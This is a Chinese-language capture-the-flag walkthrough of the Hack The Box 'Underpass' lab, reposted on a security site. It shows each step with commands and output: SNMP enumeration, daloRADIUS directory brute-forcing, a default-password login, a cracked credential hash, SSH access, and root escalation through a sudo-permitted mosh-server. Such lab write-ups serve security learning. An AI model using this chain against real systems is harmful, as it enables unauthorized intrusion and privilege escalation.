HTB-Underpass

admin
admin
admin
138359
文章
113
评论
2025年4月9日21:57:26评论8 views字数 2366阅读7分53秒阅读模式

信息收集

nmap

nmap --min-rate 10000 -A 10.10.11.48

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_  256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.52 (Ubuntu)
22 / 80端口
访问80端口,是Apache2网站的初始界面

想其他方面的信息

nmap UDP端口扫描

nmap -sU -p 161 --script "snmp*" 10.10.11.48

  • --script "snmp*":使用nmap自带的snmp脚本
snmp-info:基本信息枚举(推荐)
snmp-processes:列出运行进程
snmp-interfaces:列出网络接口
snmp-win32-services:Windows 系统服务信息
snmp-win32-shares:Windows 共享枚举
snmp-brute:暴力破解社区字符串
PORT    STATE SERVICE
161/udp open  snmp
| snmp-sysdescr: Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
|_  System uptime: 16h52m54.74s (6077474 timeticks)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: c7ad5c4856d1cf6600000000
|   snmpEngineBoots: 31
|_  snmpEngineTime: 16h52m42s
| snmp-brute: 
|_  public - Valid credentials
161 -> snmp服务

snmp-check

snmp-check -c public 10.10.11.48

HTB-Underpass
underpass01
steve用户 daloradius服务
daloradius服务:是一个基于 Web 的 RADIUS 认证管理工具,用于管理和监控 RADIUS 服务器,RADIUS(远程身份验证拨号用户服务)通常用于集中化的用户认证、授权和计费,广泛应用于网络设备(如 VPN、无线接入点)和其他基于网络的认证服务。
HTB-Underpass
underpass03

daloRADIUS - feroxbuster 目录扫描

feroxbuster -u http://10.10.11.48/daloradius/

HTB-Underpass
underpass04
得到了这个 users -> 登录框
http://10.10.11.48/daloradius/app/users ->  http://10.10.11.48/daloradius/app/users/login.php
弱口令 -> administrator/radius
HTB-Underpass
underpass06
发现提示密码错误
再继续目录扫描时,发现一个 operators 目录

dirsearch -u "http://underpass.htb/daloradius/app/" -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

HTB-Underpass
underpass07
http://10.10.11.48/daloradius/app/operators/ -> http://10.10.11.48/daloradius/app/operators/login.php
又是一个登录框 -> 尝试弱口令 -> 成功进入后台
HTB-Underpass
underpass09
合理了 -> operators才是管理员的后台
HTB-Underpass
underpass08
svcMosh : 412DD4759978ACFCC81DEAB01B382403

这密码一看就是经过加密的 尝试哈希爆破

svcMosh : underwaterfriends

https://crackstation.net/

HTB-Underpass
underpass10

ssh - svcMosh

ssh [email protected]

获取user.txt

privilege

信息收集 -> 测试常用的寻找提权手段的命令
sudo -l # /usr/bin/mosh-server -> 可以无密码以root权限执行
HTB-Underpass
underpass11
了解该命令手册 -> 寻找有用的参数
了解到了 mosh(客户端) mosh-server(服务端) -> 就像是ssh一样 可以进行远程连接
--server
HTB-Underpass
underpass12

连接至本地,刚好mosh-serverroot身份执行无需密码

mosh --server="sudo /usr/bin/mosh-server" localhost
当TCP扫描之后 -> 无头绪 -> 要想其他协议的扫描 -> 了解了UDP扫描
UDP -> SNMP服务 -> daloradius服务 -> 回到了WEB网站
此时有了服务 -> 结合服务 Google -> 寻找到信息泄露 -> 后台 默认密码 -> Getshell

对于特殊命令( 无密码以root权限执行 ) -> 学习该命令 -> 分析参数 -> 提权

原文始发于微信公众号(夜风Sec):HTB-Underpass

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月9日21:57:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB-Underpasshttp://cn-sec.com/archives/3934749.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息